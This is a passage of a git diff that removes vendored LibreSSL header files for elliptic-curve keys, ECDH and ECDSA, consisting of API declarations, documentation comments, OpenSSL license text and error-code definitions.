- *  \param  group  EC_GROUP to use in the EC_KEY object (note: the EC_KEY
- *                 object will use an own copy of the EC_GROUP).
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_set_group(EC_KEY *key, const EC_GROUP *group);
-
-/** Returns the private key of a EC_KEY object.
- *  \param  key  EC_KEY object
- *  \return a BIGNUM with the private key (possibly NULL).
- */
-const BIGNUM *EC_KEY_get0_private_key(const EC_KEY *key);
-
-/** Sets the private key of a EC_KEY object.
- *  \param  key  EC_KEY object
- *  \param  prv  BIGNUM with the private key (note: the EC_KEY object
- *               will use an own copy of the BIGNUM).
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_set_private_key(EC_KEY *key, const BIGNUM *prv);
-
-/** Returns the public key of a EC_KEY object.
- *  \param  key  the EC_KEY object
- *  \return a EC_POINT object with the public key (possibly NULL)
- */
-const EC_POINT *EC_KEY_get0_public_key(const EC_KEY *key);
-
-/** Sets the public key of a EC_KEY object.
- *  \param  key  EC_KEY object
- *  \param  pub  EC_POINT object with the public key (note: the EC_KEY object
- *               will use an own copy of the EC_POINT object).
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_set_public_key(EC_KEY *key, const EC_POINT *pub);
-
-unsigned EC_KEY_get_enc_flags(const EC_KEY *key);
-void EC_KEY_set_enc_flags(EC_KEY *eckey, unsigned int flags);
-point_conversion_form_t EC_KEY_get_conv_form(const EC_KEY *key);
-void EC_KEY_set_conv_form(EC_KEY *eckey, point_conversion_form_t cform);
-/* functions to set/get method specific data  */
-void *EC_KEY_get_key_method_data(EC_KEY *key, 
-	void *(*dup_func)(void *), void (*free_func)(void *), void (*clear_free_func)(void *));
-/** Sets the key method data of an EC_KEY object, if none has yet been set.
- *  \param  key              EC_KEY object
- *  \param  data             opaque data to install.
- *  \param  dup_func         a function that duplicates |data|.
- *  \param  free_func        a function that frees |data|.
- *  \param  clear_free_func  a function that wipes and frees |data|.
- *  \return the previously set data pointer, or NULL if |data| was inserted.
- */
-void *EC_KEY_insert_key_method_data(EC_KEY *key, void *data,
-	void *(*dup_func)(void *), void (*free_func)(void *), void (*clear_free_func)(void *));
-/* wrapper functions for the underlying EC_GROUP object */
-void EC_KEY_set_asn1_flag(EC_KEY *eckey, int asn1_flag);
-
-/** Creates a table of pre-computed multiples of the generator to 
- *  accelerate further EC_KEY operations.
- *  \param  key  EC_KEY object
- *  \param  ctx  BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_precompute_mult(EC_KEY *key, BN_CTX *ctx);
-
-/** Creates a new ec private (and optional a new public) key.
- *  \param  key  EC_KEY object
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_generate_key(EC_KEY *key);
-
-/** Verifies that a private and/or public key is valid.
- *  \param  key  the EC_KEY object
- *  \return 1 on success and 0 otherwise.
- */
-int EC_KEY_check_key(const EC_KEY *key);
-
-/** Sets a public key from affine coordindates performing
- *  neccessary NIST PKV tests.
- *  \param  key  the EC_KEY object
- *  \param  x    public key x coordinate
- *  \param  y    public key y coordinate
- *  \return 1 on success and 0 otherwise.
- */
-int EC_KEY_set_public_key_affine_coordinates(EC_KEY *key, BIGNUM *x, BIGNUM *y);
-
-
-/********************************************************************/
-/*        de- and encoding functions for SEC1 ECPrivateKey          */
-/********************************************************************/
-
-/** Decodes a private key from a memory buffer.
- *  \param  key  a pointer to a EC_KEY object which should be used (or NULL)
- *  \param  in   pointer to memory with the DER encoded private key
- *  \param  len  length of the DER encoded private key
- *  \return the decoded private key or NULL if an error occurred.
- */
-EC_KEY *d2i_ECPrivateKey(EC_KEY **key, const unsigned char **in, long len);
-
-/** Encodes a private key object and stores the result in a buffer.
- *  \param  key  the EC_KEY object to encode
- *  \param  out  the buffer for the result (if NULL the function returns number
- *               of bytes needed).
- *  \return 1 on success and 0 if an error occurred.
- */
-int i2d_ECPrivateKey(EC_KEY *key, unsigned char **out);
-
-
-/********************************************************************/
-/*        de- and encoding functions for EC parameters              */
-/********************************************************************/
-
-/** Decodes ec parameter from a memory buffer.
- *  \param  key  a pointer to a EC_KEY object which should be used (or NULL)
- *  \param  in   pointer to memory with the DER encoded ec parameters
- *  \param  len  length of the DER encoded ec parameters
- *  \return a EC_KEY object with the decoded parameters or NULL if an error
- *          occurred.
- */
-EC_KEY *d2i_ECParameters(EC_KEY **key, const unsigned char **in, long len);
-
-/** Encodes ec parameter and stores the result in a buffer.
- *  \param  key  the EC_KEY object with ec paramters to encode
- *  \param  out  the buffer for the result (if NULL the function returns number
- *               of bytes needed).
- *  \return 1 on success and 0 if an error occurred.
- */
-int i2d_ECParameters(EC_KEY *key, unsigned char **out);
-
-
-/********************************************************************/
-/*         de- and encoding functions for EC public key             */
-/*         (octet string, not DER -- hence 'o2i' and 'i2o')         */
-/********************************************************************/
-
-/** Decodes a ec public key from a octet string.
- *  \param  key  a pointer to a EC_KEY object which should be used
- *  \param  in   memory buffer with the encoded public key
- *  \param  len  length of the encoded public key
- *  \return EC_KEY object with decoded public key or NULL if an error
- *          occurred.
- */
-EC_KEY *o2i_ECPublicKey(EC_KEY **key, const unsigned char **in, long len);
-
-/** Encodes a ec public key in an octet string.
- *  \param  key  the EC_KEY object with the public key
- *  \param  out  the buffer for the result (if NULL the function returns number
- *               of bytes needed).
- *  \return 1 on success and 0 if an error occurred
- */
-int i2o_ECPublicKey(EC_KEY *key, unsigned char **out);
-
-#ifndef OPENSSL_NO_BIO
-/** Prints out the ec parameters on human readable form.
- *  \param  bp   BIO object to which the information is printed
- *  \param  key  EC_KEY object
- *  \return 1 on success and 0 if an error occurred
- */
-int	ECParameters_print(BIO *bp, const EC_KEY *key);
-
-/** Prints out the contents of a EC_KEY object
- *  \param  bp   BIO object to which the information is printed
- *  \param  key  EC_KEY object
- *  \param  off  line offset 
- *  \return 1 on success and 0 if an error occurred
- */
-int	EC_KEY_print(BIO *bp, const EC_KEY *key, int off);
-
-#endif
-/** Prints out the ec parameters on human readable form.
- *  \param  fp   file descriptor to which the information is printed
- *  \param  key  EC_KEY object
- *  \return 1 on success and 0 if an error occurred
- */
-int	ECParameters_print_fp(FILE *fp, const EC_KEY *key);
-
-/** Prints out the contents of a EC_KEY object
- *  \param  fp   file descriptor to which the information is printed
- *  \param  key  EC_KEY object
- *  \param  off  line offset 
- *  \return 1 on success and 0 if an error occurred
- */
-int	EC_KEY_print_fp(FILE *fp, const EC_KEY *key, int off);
-
-EC_KEY *ECParameters_dup(EC_KEY *key);
-
-#ifndef __cplusplus
-#if defined(__SUNPRO_C)
-#  if __SUNPRO_C >= 0x520
-# pragma error_messages (default,E_ARRAY_OF_INCOMPLETE_NONAME,E_ARRAY_OF_INCOMPLETE)
-#  endif
-# endif
-#endif
-
-#define EVP_PKEY_CTX_set_ec_paramgen_curve_nid(ctx, nid) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, EVP_PKEY_OP_PARAMGEN, \
-				EVP_PKEY_CTRL_EC_PARAMGEN_CURVE_NID, nid, NULL)
-
-
-#define EVP_PKEY_CTRL_EC_PARAMGEN_CURVE_NID		(EVP_PKEY_ALG_CTRL + 1)
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_EC_strings(void);
-
-/* Error codes for the EC functions. */
-
-/* Function codes. */
-#define EC_F_BN_TO_FELEM				 224
-#define EC_F_COMPUTE_WNAF				 143
-#define EC_F_D2I_ECPARAMETERS				 144
-#define EC_F_D2I_ECPKPARAMETERS				 145
-#define EC_F_D2I_ECPRIVATEKEY				 146
-#define EC_F_DO_EC_KEY_PRINT				 221
-#define EC_F_ECKEY_PARAM2TYPE				 223
-#define EC_F_ECKEY_PARAM_DECODE				 212
-#define EC_F_ECKEY_PRIV_DECODE				 213
-#define EC_F_ECKEY_PRIV_ENCODE				 214
-#define EC_F_ECKEY_PUB_DECODE				 215
-#define EC_F_ECKEY_PUB_ENCODE				 216
-#define EC_F_ECKEY_TYPE2PARAM				 220
-#define EC_F_ECPARAMETERS_PRINT				 147
-#define EC_F_ECPARAMETERS_PRINT_FP			 148
-#define EC_F_ECPKPARAMETERS_PRINT			 149
-#define EC_F_ECPKPARAMETERS_PRINT_FP			 150
-#define EC_F_ECP_NIST_MOD_192				 203
-#define EC_F_ECP_NIST_MOD_224				 204
-#define EC_F_ECP_NIST_MOD_256				 205
-#define EC_F_ECP_NIST_MOD_521				 206
-#define EC_F_ECP_NISTZ256_GET_AFFINE			 240
-#define EC_F_ECP_NISTZ256_MULT_PRECOMPUTE		 243
-#define EC_F_ECP_NISTZ256_POINTS_MUL			 241
-#define EC_F_ECP_NISTZ256_PRE_COMP_NEW			 244
-#define EC_F_ECP_NISTZ256_SET_WORDS			 245
-#define EC_F_ECP_NISTZ256_WINDOWED_MUL			 242
-#define EC_F_EC_ASN1_GROUP2CURVE			 153
-#define EC_F_EC_ASN1_GROUP2FIELDID			 154
-#define EC_F_EC_ASN1_GROUP2PARAMETERS			 155
-#define EC_F_EC_ASN1_GROUP2PKPARAMETERS			 156
-#define EC_F_EC_ASN1_PARAMETERS2GROUP			 157
-#define EC_F_EC_ASN1_PKPARAMETERS2GROUP			 158
-#define EC_F_EC_EX_DATA_SET_DATA			 211
-#define EC_F_EC_GF2M_MONTGOMERY_POINT_MULTIPLY		 208
-#define EC_F_EC_GF2M_SIMPLE_GROUP_CHECK_DISCRIMINANT	 159
-#define EC_F_EC_GF2M_SIMPLE_GROUP_SET_CURVE		 195
-#define EC_F_EC_GF2M_SIMPLE_OCT2POINT			 160
-#define EC_F_EC_GF2M_SIMPLE_POINT2OCT			 161
-#define EC_F_EC_GF2M_SIMPLE_POINT_GET_AFFINE_COORDINATES 162
-#define EC_F_EC_GF2M_SIMPLE_POINT_SET_AFFINE_COORDINATES 163
-#define EC_F_EC_GF2M_SIMPLE_SET_COMPRESSED_COORDINATES	 164
-#define EC_F_EC_GFP_MONT_FIELD_DECODE			 133
-#define EC_F_EC_GFP_MONT_FIELD_ENCODE			 134
-#define EC_F_EC_GFP_MONT_FIELD_MUL			 131
-#define EC_F_EC_GFP_MONT_FIELD_SET_TO_ONE		 209
-#define EC_F_EC_GFP_MONT_FIELD_SQR			 132
-#define EC_F_EC_GFP_MONT_GROUP_SET_CURVE		 189
-#define EC_F_EC_GFP_MONT_GROUP_SET_CURVE_GFP		 135
-#define EC_F_EC_GFP_NISTP224_GROUP_SET_CURVE		 225
-#define EC_F_EC_GFP_NISTP224_POINTS_MUL			 228
-#define EC_F_EC_GFP_NISTP224_POINT_GET_AFFINE_COORDINATES 226
-#define EC_F_EC_GFP_NISTP256_GROUP_SET_CURVE		 230
-#define EC_F_EC_GFP_NISTP256_POINTS_MUL			 231
-#define EC_F_EC_GFP_NISTP256_POINT_GET_AFFINE_COORDINATES 232
-#define EC_F_EC_GFP_NISTP521_GROUP_SET_CURVE		 233
-#define EC_F_EC_GFP_NISTP521_POINTS_MUL			 234
-#define EC_F_EC_GFP_NISTP521_POINT_GET_AFFINE_COORDINATES 235
-#define EC_F_EC_GFP_NIST_FIELD_MUL			 200
-#define EC_F_EC_GFP_NIST_FIELD_SQR			 201
-#define EC_F_EC_GFP_NIST_GROUP_SET_CURVE		 202
-#define EC_F_EC_GFP_SIMPLE_GROUP_CHECK_DISCRIMINANT	 165
-#define EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE		 166
-#define EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE_GFP		 100
-#define EC_F_EC_GFP_SIMPLE_GROUP_SET_GENERATOR		 101
-#define EC_F_EC_GFP_SIMPLE_MAKE_AFFINE			 102
-#define EC_F_EC_GFP_SIMPLE_OCT2POINT			 103
-#define EC_F_EC_GFP_SIMPLE_POINT2OCT			 104
-#define EC_F_EC_GFP_SIMPLE_POINTS_MAKE_AFFINE		 137
-#define EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES	 167
-#define EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES_GFP 105
-#define EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES	 168
-#define EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES_GFP 128
-#define EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES	 169
-#define EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES_GFP 129
-#define EC_F_EC_GROUP_CHECK				 170
-#define EC_F_EC_GROUP_CHECK_DISCRIMINANT		 171
-#define EC_F_EC_GROUP_COPY				 106
-#define EC_F_EC_GROUP_GET0_GENERATOR			 139
-#define EC_F_EC_GROUP_GET_COFACTOR			 140
-#define EC_F_EC_GROUP_GET_CURVE_GF2M			 172
-#define EC_F_EC_GROUP_GET_CURVE_GFP			 130
-#define EC_F_EC_GROUP_GET_DEGREE			 173
-#define EC_F_EC_GROUP_GET_ORDER				 141
-#define EC_F_EC_GROUP_GET_PENTANOMIAL_BASIS		 193
-#define EC_F_EC_GROUP_GET_TRINOMIAL_BASIS		 194
-#define EC_F_EC_GROUP_NEW				 108
-#define EC_F_EC_GROUP_NEW_BY_CURVE_NAME			 174
-#define EC_F_EC_GROUP_NEW_FROM_DATA			 175
-#define EC_F_EC_GROUP_PRECOMPUTE_MULT			 142
-#define EC_F_EC_GROUP_SET_CURVE_GF2M			 176
-#define EC_F_EC_GROUP_SET_CURVE_GFP			 109
-#define EC_F_EC_GROUP_SET_EXTRA_DATA			 110
-#define EC_F_EC_GROUP_SET_GENERATOR			 111
-#define EC_F_EC_KEY_CHECK_KEY				 177
-#define EC_F_EC_KEY_COPY				 178
-#define EC_F_EC_KEY_GENERATE_KEY			 179
-#define EC_F_EC_KEY_NEW					 182
-#define EC_F_EC_KEY_PRINT				 180
-#define EC_F_EC_KEY_PRINT_FP				 181
-#define EC_F_EC_KEY_SET_PUBLIC_KEY_AFFINE_COORDINATES	 229
-#define EC_F_EC_POINTS_MAKE_AFFINE			 136
-#define EC_F_EC_POINT_ADD				 112
-#define EC_F_EC_POINT_CMP				 113
-#define EC_F_EC_POINT_COPY				 114
-#define EC_F_EC_POINT_DBL				 115
-#define EC_F_EC_POINT_GET_AFFINE_COORDINATES_GF2M	 183
-#define EC_F_EC_POINT_GET_AFFINE_COORDINATES_GFP	 116
-#define EC_F_EC_POINT_GET_JPROJECTIVE_COORDINATES_GFP	 117
-#define EC_F_EC_POINT_INVERT				 210
-#define EC_F_EC_POINT_IS_AT_INFINITY			 118
-#define EC_F_EC_POINT_IS_ON_CURVE			 119
-#define EC_F_EC_POINT_MAKE_AFFINE			 120
-#define EC_F_EC_POINT_MUL				 184
-#define EC_F_EC_POINT_NEW				 121
-#define EC_F_EC_POINT_OCT2POINT				 122
-#define EC_F_EC_POINT_POINT2OCT				 123
-#define EC_F_EC_POINT_SET_AFFINE_COORDINATES_GF2M	 185
-#define EC_F_EC_POINT_SET_AFFINE_COORDINATES_GFP	 124
-#define EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GF2M	 186
-#define EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GFP	 125
-#define EC_F_EC_POINT_SET_JPROJECTIVE_COORDINATES_GFP	 126
-#define EC_F_EC_POINT_SET_TO_INFINITY			 127
-#define EC_F_EC_PRE_COMP_DUP				 207
-#define EC_F_EC_PRE_COMP_NEW				 196
-#define EC_F_EC_WNAF_MUL				 187
-#define EC_F_EC_WNAF_PRECOMPUTE_MULT			 188
-#define EC_F_I2D_ECPARAMETERS				 190
-#define EC_F_I2D_ECPKPARAMETERS				 191
-#define EC_F_I2D_ECPRIVATEKEY				 192
-#define EC_F_I2O_ECPUBLICKEY				 151
-#define EC_F_NISTP224_PRE_COMP_NEW			 227
-#define EC_F_NISTP256_PRE_COMP_NEW			 236
-#define EC_F_NISTP521_PRE_COMP_NEW			 237
-#define EC_F_O2I_ECPUBLICKEY				 152
-#define EC_F_OLD_EC_PRIV_DECODE				 222
-#define EC_F_PKEY_EC_CTRL				 197
-#define EC_F_PKEY_EC_CTRL_STR				 198
-#define EC_F_PKEY_EC_DERIVE				 217
-#define EC_F_PKEY_EC_KEYGEN				 199
-#define EC_F_PKEY_EC_PARAMGEN				 219
-#define EC_F_PKEY_EC_SIGN				 218
-
-/* Reason codes. */
-#define EC_R_ASN1_ERROR					 115
-#define EC_R_ASN1_UNKNOWN_FIELD				 116
-#define EC_R_BIGNUM_OUT_OF_RANGE			 144
-#define EC_R_BUFFER_TOO_SMALL				 100
-#define EC_R_COORDINATES_OUT_OF_RANGE			 146
-#define EC_R_D2I_ECPKPARAMETERS_FAILURE			 117
-#define EC_R_DECODE_ERROR				 142
-#define EC_R_DISCRIMINANT_IS_ZERO			 118
-#define EC_R_EC_GROUP_NEW_BY_NAME_FAILURE		 119
-#define EC_R_FIELD_TOO_LARGE				 143
-#define EC_R_GF2M_NOT_SUPPORTED				 147
-#define EC_R_GROUP2PKPARAMETERS_FAILURE			 120
-#define EC_R_I2D_ECPKPARAMETERS_FAILURE			 121
-#define EC_R_INCOMPATIBLE_OBJECTS			 101
-#define EC_R_INVALID_ARGUMENT				 112
-#define EC_R_INVALID_COMPRESSED_POINT			 110
-#define EC_R_INVALID_COMPRESSION_BIT			 109
-#define EC_R_INVALID_CURVE				 141
-#define EC_R_INVALID_DIGEST_TYPE			 138
-#define EC_R_INVALID_ENCODING				 102
-#define EC_R_INVALID_FIELD				 103
-#define EC_R_INVALID_FORM				 104
-#define EC_R_INVALID_GROUP_ORDER			 122
-#define EC_R_INVALID_PENTANOMIAL_BASIS			 132
-#define EC_R_INVALID_PRIVATE_KEY			 123
-#define EC_R_INVALID_TRINOMIAL_BASIS			 137
-#define EC_R_KEYS_NOT_SET				 140
-#define EC_R_MISSING_PARAMETERS				 124
-#define EC_R_MISSING_PRIVATE_KEY			 125
-#define EC_R_NOT_A_NIST_PRIME				 135
-#define EC_R_NOT_A_SUPPORTED_NIST_PRIME			 136
-#define EC_R_NOT_IMPLEMENTED				 126
-#define EC_R_NOT_INITIALIZED				 111
-#define EC_R_NO_FIELD_MOD				 133
-#define EC_R_NO_PARAMETERS_SET				 139
-#define EC_R_PASSED_NULL_PARAMETER			 134
-#define EC_R_PKPARAMETERS2GROUP_FAILURE			 127
-#define EC_R_POINT_AT_INFINITY				 106
-#define EC_R_POINT_IS_NOT_ON_CURVE			 107
-#define EC_R_SLOT_FULL					 108
-#define EC_R_UNDEFINED_GENERATOR			 113
-#define EC_R_UNDEFINED_ORDER				 128
-#define EC_R_UNKNOWN_GROUP				 129
-#define EC_R_UNKNOWN_ORDER				 114
-#define EC_R_UNSUPPORTED_FIELD				 131
-#define EC_R_WRONG_CURVE_PARAMETERS			 145
-#define EC_R_WRONG_ORDER				 130
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ecdh.h b/thirdparty/libressl/include/openssl/ecdh.h
deleted file mode 100644
index ccc1312..0000000
--- a/thirdparty/libressl/include/openssl/ecdh.h
+++ /dev/null
@@ -1,128 +0,0 @@
-/* $OpenBSD: ecdh.h,v 1.5 2015/09/13 12:03:07 jsing Exp $ */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- *
- * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
- * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
- * to the OpenSSL project.
- *
- * The ECC Code is licensed pursuant to the OpenSSL open source
- * license provided below.
- *
- * The ECDH software is originally written by Douglas Stebila of
- * Sun Microsystems Laboratories.
- *
- */
-/* ====================================================================
- * Copyright (c) 2000-2002 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-#ifndef HEADER_ECDH_H
-#define HEADER_ECDH_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_ECDH
-#error ECDH is disabled.
-#endif
-
-#include <openssl/ec.h>
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-const ECDH_METHOD *ECDH_OpenSSL(void);
-
-void ECDH_set_default_method(const ECDH_METHOD *);
-const ECDH_METHOD *ECDH_get_default_method(void);
-int ECDH_set_method(EC_KEY *, const ECDH_METHOD *);
-
-int ECDH_size(const EC_KEY *ecdh);
-int ECDH_compute_key(void *out, size_t outlen, const EC_POINT *pub_key,
-    EC_KEY *ecdh,
-    void *(*KDF)(const void *in, size_t inlen, void *out, size_t *outlen));
-
-int 	  ECDH_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new
-*new_func, CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int 	  ECDH_set_ex_data(EC_KEY *d, int idx, void *arg);
-void 	  *ECDH_get_ex_data(EC_KEY *d, int idx);
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_ECDH_strings(void);
-
-/* Error codes for the ECDH functions. */
-
-/* Function codes. */
-#define ECDH_F_ECDH_CHECK				 102
-#define ECDH_F_ECDH_COMPUTE_KEY				 100
-#define ECDH_F_ECDH_DATA_NEW_METHOD			 101
-
-/* Reason codes. */
-#define ECDH_R_KDF_FAILED				 102
-#define ECDH_R_KEY_TRUNCATION				 104
-#define ECDH_R_NON_FIPS_METHOD				 103
-#define ECDH_R_NO_PRIVATE_VALUE				 100
-#define ECDH_R_POINT_ARITHMETIC_FAILURE			 101
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ecdsa.h b/thirdparty/libressl/include/openssl/ecdsa.h
deleted file mode 100644
index 530ab26..0000000
--- a/thirdparty/libressl/include/openssl/ecdsa.h
+++ /dev/null
@@ -1,286 +0,0 @@
-/* $OpenBSD: ecdsa.h,v 1.4 2015/02/08 13:35:06 jsing Exp $ */
-/**
- * \file   crypto/ecdsa/ecdsa.h Include file for the OpenSSL ECDSA functions
- * \author Written by Nils Larsch for the OpenSSL project
- */
-/* ====================================================================
- * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-#ifndef HEADER_ECDSA_H
-#define HEADER_ECDSA_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_ECDSA
-#error ECDSA is disabled.
-#endif
-
-#include <openssl/ec.h>
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-typedef struct ECDSA_SIG_st ECDSA_SIG;
-
-struct ecdsa_method {
-	const char *name;
-	ECDSA_SIG *(*ecdsa_do_sign)(const unsigned char *dgst, int dgst_len,
-	    const BIGNUM *inv, const BIGNUM *rp, EC_KEY *eckey);
-	int (*ecdsa_sign_setup)(EC_KEY *eckey, BN_CTX *ctx, BIGNUM **kinv,
-	    BIGNUM **r);
-	int (*ecdsa_do_verify)(const unsigned char *dgst, int dgst_len,
-	    const ECDSA_SIG *sig, EC_KEY *eckey);
-#if 0
-	int (*init)(EC_KEY *eckey);
-	int (*finish)(EC_KEY *eckey);
-#endif
-	int flags;
-	char *app_data;
-};
-
-/* If this flag is set the ECDSA method is FIPS compliant and can be used
- * in FIPS mode. This is set in the validated module method. If an
- * application sets this flag in its own methods it is its responsibility
- * to ensure the result is compliant.
- */
-
-#define ECDSA_FLAG_FIPS_METHOD  0x1
-
-struct ECDSA_SIG_st {
-	BIGNUM *r;
-	BIGNUM *s;
-};
-
-/** Allocates and initialize a ECDSA_SIG structure
- *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
- */
-ECDSA_SIG *ECDSA_SIG_new(void);
-
-/** frees a ECDSA_SIG structure
- *  \param  sig  pointer to the ECDSA_SIG structure
- */
-void ECDSA_SIG_free(ECDSA_SIG *sig);
-
-/** DER encode content of ECDSA_SIG object (note: this function modifies *pp
- *  (*pp += length of the DER encoded signature)).
- *  \param  sig  pointer to the ECDSA_SIG object
- *  \param  pp   pointer to a unsigned char pointer for the output or NULL
- *  \return the length of the DER encoded ECDSA_SIG object or 0
- */
-int i2d_ECDSA_SIG(const ECDSA_SIG *sig, unsigned char **pp);
-
-/** Decodes a DER encoded ECDSA signature (note: this function changes *pp
- *  (*pp += len)).
- *  \param  sig  pointer to ECDSA_SIG pointer (may be NULL)
- *  \param  pp   memory buffer with the DER encoded signature
- *  \param  len  length of the buffer
- *  \return pointer to the decoded ECDSA_SIG structure (or NULL)
- */
-ECDSA_SIG *d2i_ECDSA_SIG(ECDSA_SIG **sig, const unsigned char **pp, long len);
-
-/** Computes the ECDSA signature of the given hash value using
- *  the supplied private key and returns the created signature.
- *  \param  dgst      pointer to the hash value
- *  \param  dgst_len  length of the hash value
- *  \param  eckey     EC_KEY object containing a private EC key
- *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
- */
-ECDSA_SIG *ECDSA_do_sign(const unsigned char *dgst, int dgst_len,
-    EC_KEY *eckey);
-
-/** Computes ECDSA signature of a given hash value using the supplied
